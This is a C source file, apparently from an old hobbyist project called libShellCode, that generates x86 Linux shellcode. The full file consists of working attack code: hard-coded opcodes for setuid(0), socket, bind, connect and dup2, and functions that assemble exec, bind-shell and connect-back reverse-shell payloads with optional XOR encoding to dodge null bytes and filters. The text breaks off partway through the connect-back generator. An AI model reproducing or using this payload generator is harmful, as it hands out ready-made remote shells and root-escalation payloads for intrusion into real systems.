/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include "../include/codes.h"

#define LIBSHELLCODE_VERSION "0.2.1"


/*
 * Function:    version()
 * Parameters:
 * Return:      char *          the pointer to the actual libShellCode version
 * Description: Return the actual libShellCode version
 *
 */

char *libShellCode_version()
{
  return LIBSHELLCODE_VERSION;
}

/*
 * Function:    initialize_codes()
 * Parameters:
 * Return:      
 * Description: Initialize the codes used to build the ShellCodes
 *
 */

void initialize_codes()
{
  // Find the actual memory adress
  JMP          = (char *) strdup("\xeb\x01");               // jmp    call
  CALL         = (char *) strdup("\xe8\x01\xff\xff\xff");   // call   pop
  POP_ESI      = (char *) strdup("\x5e");                   // popl   %esi
  
  // zeroing a register
  XOR_EAX_EAX  = (char *) strdup("\x31\xc0");               // xor    %eax, %eax
  XOR_EBX_EBX  = (char *) strdup("\x31\xdb");               // xor    %ebx, %ebx
  XOR_ECX_ECX  = (char *) strdup("\x31\xc9");               // xor    %ecx, %ecx
  XOR_EDX_EDX  = (char *) strdup("\x31\xd2");               // xor    %edx, %edx 
  
  // Move a value to a register
  MOV_IN_AL    = (char *) strdup("\xb0\x01");               // movb   $0x1, %al
  MOV_IN_CL    = (char *) strdup("\xb1\x01");               // movb   $0x1, %cl
  MOV_IN_DL    = (char *) strdup("\xb2\x01");               // movb   $0x1, %dl
  MOV_IN_CH    = (char *) strdup("\xb5\x01");               // movb   $0x1, %ch
  MOV_IN_CX    = (char *) strdup("\x66\xb9\x01\x01");       // movw   $0x101, %cx

  // Move a register to a register
  MOV_EAX_EBX  = (char *) strdup("\x89\xc3");               // mov     %eax,%ebx
  MOV_EAX_ECX  = (char *) strdup("\x89\xc1");               // mov     %eax,%ecx  
  MOV_ECX_EAX  = (char *) strdup("\x89\xc8");               // mov     %ecx,%eax  
  MOV_ESI_EBX  = (char *) strdup("\x89\xf3");               // mov     %esi,%ebx
  MOV_ESI_ECX  = (char *) strdup("\x89\xf1");               // mov     %esi,%ecx
  MOV_EDI_EBX  = (char *) strdup("\x89\xfb");               // mov     %edi,%ebx 

  // Move a register to memory
  MOV_DL_nESI  = (char *) strdup("\x88\x56\x01");           // movb    %dl, 0x1(%esi)    
  MOV_AL_nESI  = (char *) strdup("\x88\x46\x01");           // movb    %al, 0x1(%esi)       
  MOV_ESI_nESI = (char *) strdup("\x89\x76\x01");           // mov     %esi,0x1(%esi)
  MOV_EAX_nESI = (char *) strdup("\x89\x46\x01");           // mov     %eax,0x1(%esi)
  MOV_EBX_nESI = (char *) strdup("\x89\x5e\x01");           // mov     %ebx,0x1(%esi)  
  
  // Increment, decrement a register
  INC_EAX      = (char *) strdup("\x40");                   // inc    %eax 
  INC_EBX      = (char *) strdup("\x43");                   // inc    %ebx 

  // Add and sub
  ADD_BL       = (char *) strdup("\x80\xc3\x01");           // add    $0x1, %bl
  ADD_ECX_ESI  = (char *) strdup("\x01\xce");               // add    %ecx,%esi  
  SUB_EBX      = (char *) strdup("\x83\xeb\x01");           // sub    $0x1, %ebx

  // XOR memory
  XOR_AL_EBX   = (char *) strdup("\x30\x03");               // xor    %al,  (%ebx)

  // Lea
  LEA_nEBX_ECX = (char *) strdup("\x8d\x4b\x01");           // leal   0x1(%ebx), %ecx 
  LEA_nESI_ECX = (char *) strdup("\x8d\x4e\x01");           // leal   0x1(%esi), %ecx 
  LEA_nESI_EDX = (char *) strdup("\x8d\x56\x01");           // leal   0x1(%esi), %edx 

  // Loop and jumps
  LOOP         = (char *) strdup("\xe2\xfb");               // loop   xor
  CMP_EAX_EDX  = (char *) strdup("\x39\xc2");               // cmp    %eax, %edx  
  JNE          = (char *) strdup("\x75\x01");               // je                

  // Interrupt calling
  INT_80       = (char *) strdup("\xcd\x80");               // int    $0x80

  // Completed System Calls
  EXIT_0       = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax   
                                 "\x31\xdb"                 // xor    %ebx, %ebx 
                                 "\x40"                     // inc    %eax
                                 "\xcd\x80");               // int    $0x80 


  SETUID_0     = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax 
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\xb0\x17"                 // movb   $0x17,%al 
                                 "\xcd\x80");               // int    $0x80 


  SETREUID_0_0 = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x31\xdb"                 // xor    %ebx, %ebx
                                 "\x31\xc9"                 // xor    %ecx, %ecx
                                 "\xb0\x46"                 // mov    $0x46,%al
                                 "\xcd\x80");               // int    $0x80


  SOCKET       = (char *) strdup("\x31\xdb"                 // xor    %ebx, %ebx
                                 "\xf7\xe3"                 // mul    %ebx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\x53"                     // push   %ebx
                                 "\x43"                     // inc    %ebx
                                 "\x53"                     // push   %ebx
                                 "\x43"                     // inc    %ebx
                                 "\x53"                     // push   %ebx
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\x4b"                     // dec    %ebx
                                 "\xcd\x80"                 // int    $0x80
                                 "\x89\xc7");               // mov    %eax, %edi 


  BIND         = (char *) strdup("\x52"                     // push   %edx
                                 "\x66\x51"                 // push   %cx
                                 "\x43"                     // inc    %ebx
                                 "\x66\x53"                 // push   %bx
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb0\x10"                 // mov    $0x10,%al
                                 "\x50"                     // push   %eax
                                 "\x51"                     // push   %ecx
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  LISTEN       = (char *) strdup("\xb0\x66"                 // mov    $0x66,%al
                                 "\xb3\x04"                 // mov    $0x4, %bl
                                 "\xcd\x80");               // int    $0x80


  ACCEPT       = (char *) strdup("\x31\xc0"                 // xor    %eax, %eax
                                 "\x50"                     // push   %eax
                                 "\x50"                     // push   %eax
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\xb3\x05"                 // mov    $0x5, %bl
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  CONNECT      = (char *) strdup("\x68\x01\x01\x01\x01"     // push   $0x01010101
                                 "\x66\x51"                 // push   %cx
                                 "\x43"                     // inc    %ebx
                                 "\x66\x53"                 // push   %bx
                                 "\x89\xe1"                 // mov    %esp,%ecx
                                 "\xb0\x10"                 // mov    $0x10,%al
                                 "\x50"                     // push   %eax
                                 "\x51"                     // push   %ecx
                                 "\x57"                     // push   %edi
                                 "\x89\xe1"                 // mov    %esp, %ecx
                                 "\x43"                     // inc    %ebx
                                 "\xb0\x66"                 // mov    $0x66,%al
                                 "\xcd\x80");               // int    $0x80


  DUP2         = (char *) strdup("\x89\xd9"                 // mov    %ebx, %ecx
                                 "\xb0\x3f"                 // mov    $0x3f,%al
                                 "\x49"                     // dec    %ecx
                                 "\xcd\x80"                 // int    $0x80
                                 "\x41"                     // inc    %ecx
                                 "\xe2\xf8");               // loop   $-8
}


/*
 * Function:    free_codes()
 * Parameters:
 * Return:
 * Description: Free the memory used for the codes
 *
 */

void free_codes()
{
  free(JMP);
  free(CALL);     
  free(POP_ESI);
   
  free(XOR_EAX_EAX);  
  free(XOR_EBX_EBX);  
  free(XOR_ECX_ECX);  
  free(XOR_EDX_EDX);

  free(MOV_IN_AL);  
  free(MOV_IN_CL); 
  free(MOV_IN_DL);   
  free(MOV_IN_CH);
  free(MOV_IN_CX);  

  free(MOV_EAX_EBX); 
  free(MOV_EAX_ECX);
  free(MOV_ECX_EAX);
  free(MOV_ESI_EBX);
  free(MOV_ESI_ECX);
  free(MOV_EDI_EBX);

  free(MOV_DL_nESI); 
  free(MOV_AL_nESI);  
  free(MOV_ESI_nESI);
  free(MOV_EAX_nESI);    
  free(MOV_EBX_nESI);

  free(INC_EAX);   
  free(INC_EBX); 

  free(ADD_BL); 
  free(ADD_ECX_ESI);
  free(SUB_EBX);

  free(XOR_AL_EBX);

  free(LEA_nEBX_ECX); 
  free(LEA_nESI_ECX); 
  free(LEA_nESI_EDX);

  free(LOOP);
  free(CMP_EAX_EDX);
  free(JNE);

  free(INT_80); 
  
  free(EXIT_0); 
  free(SETUID_0);
  free(SETREUID_0_0);
  free(SOCKET);
  free(BIND);
  free(LISTEN);
  free(ACCEPT);
  free(CONNECT);
  free(DUP2);
}


/*
 * Function:    cript()
 * Parameters:  
 * Return:
 * Description: Cript the code
 *
 */

void cript(char *buff, char pad)
{
  int h, lung;

  lung=strlen(buff);

  for (h=0;h<lung;h++)
    {
      buff[h]^=pad;
    }
}


/*
 * Function:    char_rnd_gen()
 * Parameters:  
 * Return:
 * Description: Generate a random character
 *
 */

unsigned char char_rnd_gen()
{
  struct timeval tv;
  gettimeofday(&tv,NULL);
  srand(tv.tv_usec);
  return (char) rand();
}


/*
 * Function:    xor_check()
 * Parameters:  
 * Return:
 * Description: Check if some characters inside the ShellCode are equal to the
 *              byte which the code will be critped with. The result of XORing a
 *              value with itself is 0 which it is not goot for a ShellCode.
 *
 */

int xor_check(char *code, char xor_byte)
{
  int i;
  for (i=0; i<strlen(code); i++)
    {
      if (code[i]==xor_byte) return 1;
    }
  return 0;
}


/*
 * Function:    generate_file_write_SC()
 * Parameters:  char *file      the name of the file in which you want write
 *              char *message   the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int  cripted    0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message in a file
 *
 */

char *generate_file_write_SC(char *file, char *message, int setuid, int cripted)
{
  int lenfile, lenmsg;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode;
  unsigned char xor_byte;

  initialize_codes();

  lenmsg = strlen(message);
  lenfile = strlen(file);

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_ECX_ECX, XOR_EDX_EDX);

  // Open
  MOV_IN_AL[1] = 5;                    // Select the open() system call
  MOV_IN_CX[2] = 0x42;                 // Open with O_RDWR|O_CREAT|O_APPEND attrib
  MOV_IN_CX[3] = 0x04;
  MOV_DL_nESI[2] = (char) lenfile;     // Put \0 at the end of the filename

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_AL, MOV_ESI_EBX);
  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_IN_CX, MOV_DL_nESI, INT_80);

  // Write
  LEA_nEBX_ECX[2] = (char) ++lenfile;  // ECX point to the beginning of the message
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nEBX_ECX, MOV_EAX_EBX);
  sprintf(after_pop, "%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(file, xor_byte||xor_check(message, xor_byte))))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte);
      cript(file, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(file) + strlen(message) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(file)+strlen(message)+strlen(xor_code) + 2);
  sprintf(shellcode, "%s%s%s%s\x31%s\0", pre_pop, xor_code, after_pop, file, message);

  free_codes();

  return shellcode;
}


/*
 * Function:    generate_write_SC()
 * Parameters:  int out         1 = stdout - 2 = stderr
 *              char *message   the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int  cripted      0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message to stdout or stderr
 *
 */

char *generate_write_SC(int out, char *message, int setuid, int cripted)
{
  int lenfile, lenmsg;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode;
  unsigned char xor_byte;

  initialize_codes();

  lenmsg = strlen(message);

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_EBX_EBX, XOR_EDX_EDX);


  // Write
  LEA_nEBX_ECX[2] = (char) ++lenfile;  // ECX point to the beginning of the message
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  if (out == 1)  ADD_BL[2] = 1; // stdout
  if (out == 2)  ADD_BL[2] = 2; // stderr

  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_ESI_ECX, ADD_BL, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(message, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(message) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
         
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(message)+strlen(xor_code) + 1);
  sprintf(shellcode, "%s%s%s%s\0", pre_pop, xor_code, after_pop, message);

  free_codes();

  return shellcode;
}


/*
 * Function:    generate_exec_SC()
 * Parameters:  char * prog     the path of the command to execute with the command line parameters
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int exit        0 = don't execute exit(0) 
 *                              1 = execute exit(0) after execve()
 *              int  cripted      0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that executes the command you specified
 *
 */

char *generate_exec_SC(char *prog, int setuid, int exit, int cripted)
{
  int lenprog, nextptr;
  char *p, *oldp, pre_pop[64], after_pop[256], parm[128], xor_code[64], *shellcode;
  unsigned char xor_byte;
  
  initialize_codes();

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;
  lenprog = strlen(prog);
  nextptr = lenprog + 1;

  // Execve
  MOV_ESI_nESI[2] = (char) (nextptr);
  MOV_AL_nESI[2] = (char) lenprog;
  nextptr += 4;
  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_AL_nESI, MOV_ESI_nESI);

  parm[0] = '\0';
  oldp = prog;
  while(p=strchr(oldp, ' '))
    {
      MOV_AL_nESI[2] = (char) (p - prog);
      ADD_BL[2] = (char) (p - oldp + 1);
      MOV_EBX_nESI[2] = (char) (nextptr);
      sprintf(parm, "%s%s%s%s\0", parm, MOV_AL_nESI, ADD_BL, MOV_EBX_nESI);
      nextptr += 4;
      oldp=++p;
    }

  if(strlen(parm)!=0)
    {
      sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, parm);
    }
  
  MOV_EAX_nESI[2] = (char) (nextptr);
  MOV_IN_AL[1] = 0xb;
  LEA_nESI_ECX[2] = (char) (lenprog+1);
  LEA_nESI_EDX[2] = (char) (nextptr);

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_EAX_nESI, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, LEA_nESI_ECX);
  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nESI_EDX, INT_80);

  // Exit
  if (exit == 1) sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(prog, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(prog, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(prog) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
  sprintf(shellcode, "%s%s%s%s\0", pre_pop, xor_code, after_pop, prog);

  free_codes();

  return shellcode;
}


/*
 * Function:    generate_bind_SC()
 * Parameters:  char * prog     the path of the command to execute with the command line parameters
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int exit        0 = don't execute exit(0) 
 *                              1 = execute exit(0) after execve()
 *              int port        port to bind
 *              int fork        0 = don't perform fork() 
 *                              1 = perform fork() before program execution
 *              int  cripted    0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that executes the command you specified
 * Note:        Inspired to a bighawk code.
 *
 */

char *generate_bind_SC(char *prog, int setuid, int exit, int port, int fork, int cripted)
{
  int len, lenprog, nextptr;
  char *p, *oldp, network[128], pre_pop[64], after_pop[256], parm[128], xor_code[64], *shellcode;
  unsigned char xor_byte;

  initialize_codes();

  // Network 
  sprintf(network, "%s", SOCKET);

  p = (char *) &port;

  if (port < 255)
    {
      MOV_IN_CH[1] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CH);
    }
  else
    {
      MOV_IN_CX[2] = p[1];
      MOV_IN_CX[3] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CX);
    }
  
  sprintf(network, "%s%s%s%s", network, BIND, LISTEN, ACCEPT); 

  if (fork==1)
    {
      MOV_IN_AL[1] = 0x2;
      sprintf(network, "%s%s%s%s", network, MOV_EAX_ECX, MOV_IN_AL, INT_80); 
      len = 0xFF - (strlen(ACCEPT)+strlen(MOV_EAX_ECX)+strlen(MOV_IN_AL)+strlen(INT_80)+strlen(CMP_EAX_EDX)+1);
      JNE[1] = (char) len;
      sprintf(network, "%s%s%s%s", network, CMP_EAX_EDX, JNE, MOV_ECX_EAX); 
    }
  
  sprintf(network, "%s%s%s", network, MOV_EAX_EBX, DUP2);

  // Program Execution
  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;
  lenprog = strlen(prog);
  nextptr = lenprog + 1;

  // Execve
  MOV_ESI_nESI[2] = (char) (nextptr);
  MOV_AL_nESI[2] = (char) lenprog;
  nextptr += 4;
  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_AL_nESI, MOV_ESI_nESI);

  parm[0] = '\0';
  oldp = prog;
  while(p=strchr(oldp, ' '))
    {
      MOV_AL_nESI[2] = (char) (p - prog);
      ADD_BL[2] = (char) (p - oldp + 1);
      MOV_EBX_nESI[2] = (char) (nextptr);
      sprintf(parm, "%s%s%s%s\0", parm, MOV_AL_nESI, ADD_BL, MOV_EBX_nESI);
      nextptr += 4;
      oldp=++p;
    }

  if(strlen(parm)!=0)
    {
      sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, parm);
    }
  
  MOV_EAX_nESI[2] = (char) (nextptr);
  MOV_IN_AL[1] = 0xb;
  LEA_nESI_ECX[2] = (char) (lenprog+1);
  LEA_nESI_EDX[2] = (char) (nextptr);

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_EAX_nESI, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, LEA_nESI_ECX);
  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nESI_EDX, INT_80);

  // Exit
  if (exit == 1) sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte) || xor_check(prog, xor_byte) || xor_check(network, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(prog, xor_byte); 
      cript(network, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_ESI_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_IN_CL, ADD_ECX_ESI);

      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network) + strlen(prog));
      sprintf(xor_code, "%s%s", xor_code, MOV_IN_CL);

      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);

      JMP[1] = 5;  
      sprintf(xor_code, "%s%s%s", xor_code, LOOP, JMP); 
  
      JMP[1] = (strlen(xor_code) + 1);
      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      
      CALL[1] = (char) (0xFF - (strlen(xor_code) + 4 + 1));
      sprintf(xor_code, "%s%s\0", xor_code, CALL);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", pre_pop, xor_code, network, after_pop, prog);
    }
  else
    {
      JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
      CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      sprintf(after_pop, "%s%s\0", after_pop, CALL);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", network, pre_pop, xor_code, after_pop, prog);
    }
  
  free_codes();
  return shellcode;
}


/*
 * Function:    generate_connect_back_SC()
 * Parameters:  char * prog     the path of the command to execute with the command line parameters
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int exit        0 = don't execute exit(0) 
 *                              1 = execute exit(0) after execve()
 *              char *ip        the IP address where connect
 *              int port        port to connect
 *              int  cripted      0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that executes the command you specified
 * Note:        Inspired to a bighawk code.
 *
 */

char *generate_connect_back_SC(char *prog, int setuid, int exit, char *ip, int port, int cripted)
{
  int lenprog, nextptr;
  char *p, *oldp, network[128], pre_pop[64], after_pop[256], parm[128], xor_code[64], *shellcode;
  unsigned long ipnum;
  unsigned char xor_byte;

  initialize_codes();

  // Network 
  sprintf(network, "%s", SOCKET);

  p = (char *) &port;

  if (port < 255)
    {
      MOV_IN_CH[1] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CH);
    }
  else
    {
      MOV_IN_CX[2] = p[1];
      MOV_IN_CX[3] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CX);
    }

  ipnum = ntohl(inet_addr(ip));
  p = (char *) &ipnum;

  CONNECT[1] = p[3];
  CONNECT[2] = p[2]; 
  CONNECT[3] = p[1]; 
  CONNECT[4] = p[0];   

  sprintf(network, "%s%s", network, CONNECT);

  sprintf(network, "%s%s%s", network, MOV_EDI_EBX, DUP2);

  // Program Execution
  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;
  lenprog = strlen(prog);
  nextptr = lenprog + 1;

  // Execve
  MOV_ESI_nESI[2] = (char) (nextptr);
  MOV_AL_nESI[2] = (char) lenprog;
  nextptr += 4;
  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_AL_nESI, MOV_ESI_nESI);

  parm[0] = '\0';
  oldp = prog;
  while(p=strchr(oldp, ' '))
    {
      MOV_AL_nESI[2] = (char) (p - prog);
      ADD_BL[2] = (char) (p - oldp + 1);
      MOV_EBX_nESI[2] = (char) (nextptr);
      sprintf(parm, "%s%s%s%s\0", parm, MOV_AL_nESI, ADD_BL, MOV_EBX_nESI);
      nextptr += 4;
      oldp=++p;
    }

  if(strlen(parm)!=0)
    {
      sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, parm);
    }
  
  MOV_EAX_nESI[2] = (char) (nextptr);
  MOV_IN_AL[1] = 0xb;
  LEA_nESI_ECX[2] = (char) (lenprog+1);
  LEA_nESI_EDX[2] = (char) (nextptr);

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_EAX_nESI, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, LEA_nESI_ECX);
  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nESI_EDX, INT_80);

  // Exit
  if (exit == 1) sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte) || xor_check(prog, xor_byte) || xor_check(network, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(prog, xor_byte); 
      cript(network, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_ESI_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_IN_CL, ADD_ECX_ESI);

      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network) + strlen(prog));
      sprintf(xor_code, "%s%s", xor_code, MOV_IN_CL);

      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);

      JMP[1] = 5;  
      sprintf(xor_code, "%s%s%s", xor_code, LOOP, JMP); 
  
      JMP[1] = (strlen(xor_code) + 1);
      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      
      CALL[1] = (char) (0xFF - (strlen(xor_code) + 4 + 1));
